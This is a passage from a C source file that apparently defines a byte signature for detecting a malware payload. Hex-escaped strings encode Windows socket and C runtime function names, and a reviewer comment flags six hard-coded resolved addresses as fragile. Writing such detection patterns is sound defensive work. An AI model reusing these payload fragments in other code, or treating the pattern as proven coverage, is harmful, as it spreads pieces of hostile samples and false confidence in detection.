    "\\x63\\x6C\\x6F\\x73\\x65\\x73\\x6F\\x63\\x6B\\x65\\x74\\x00"  /* "closesocket\0" */

    /*
     * Six little-endian dwords, all 0x74FAxxxx, one per ws2_32 name above.
     * NOTE(review): these look like already-resolved function addresses that
     * were left in the sample's pointer table. Matching them literally
     * presumably ties the signature to payloads carrying these exact values;
     * check other captures before relying on this part of the pattern.
     */
    "\\xF5\\xD7\\xFA\\x74"
    "\\x3D\\x35\\xFA\\x74"
    "\\xB9\\xC1\\xFA\\x74"
    "\\x01\\xA1\\xFA\\x74"
    "\\xCC\\x1B\\xFA\\x74"
    "\\x5E\\x14\\xFA\\x74"

    "\\x6D\\x73\\x76\\x63\\x72\\x74\\x00"   /* "msvcrt\0" */
    "\\x66\\x6F\\x70\\x65\\x6E\\x00"        /* "fopen\0"  */
    "\\x66\\x63\\x6C\\x6F\\x73\\x65\\x00"   /* "fclose\0" */
    "\\x66\\x77\\x72\\x69\\x74\\x65\\x00"   /* "fwrite\0" */
    "\\x6D\\x65\\x6D\\x73\\x65\\x74\\x00"   /* "memset\0" */
    "\\x6D\\x61\\x6C\\x6C\\x6F\\x63\\x00"   /* "malloc\0" */
    "\\x66\\x72\\x65\\x65";                 /* "free"     */